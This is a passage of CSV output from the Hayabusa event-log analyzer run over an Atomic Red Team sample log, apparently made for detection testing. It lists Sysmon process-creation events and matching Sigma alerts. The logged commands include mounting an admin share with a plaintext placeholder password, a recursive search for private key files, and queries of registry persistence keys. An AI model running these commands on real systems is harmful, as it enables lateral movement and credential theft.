747F3D96-D844-5D31-0000-0010C70A2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D845-5D31-0000-001098212F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 747F3D96-D849-5D31-0000-0010914D2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D849-5D31-0000-00103C522F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,LatMov,Mounted Windows Admin Shares with net.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D84E-5D31-0000-00102C702F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6524 | PGUID: 747F3D96-D859-5D31-0000-0010E68C2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-D859-5D31-0000-0010FB8F2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D859-5D31-0000-001045922F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .key | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D859-5D31-0000-00109E932F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,CredAccess,Discover Private Keys,,../hayabusa-rules/sigma/process_creation/proc_creation_win_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3188 | PGUID: 747F3D96-D87B-5D31-0000-0010D92D3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2888 | PGUID: 747F3D96-D87C-5D31-0000-0010E83B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D87C-5D31-0000-0010413E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D87C-5D31-0000-00107A403100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 5256 | PGUID: 747F3D96-D87C-5D31-0000-0010CC423100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D87C-5D31-0000-001009453100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" | LID: 0x50951 | PID: 6208 | PGUID: 747F3D96-D87C-5D31-0000-00105B473100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D87C-5D31-0000-001097493100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D87C-5D31-0000-0010E94B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1428 | PGUID: 747F3D96-D87C-5D31-0000-0010264E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D87C-5D31-0000-001078503100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D87C-5D31-0000-0010B4523100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D87C-5D31-0000-001006553100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D87C-5D31-0000-00103F573100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D87C-5D31-0000-00101D5E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | PGUID: 747F3D96-D87C-5D31-0000-0010C86B3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 0x50951 | PID: 6620 | PGUID: 747F3D96-D87C-5D31-0000-001057703100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,../hayabusa-rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 196 | PGUID: 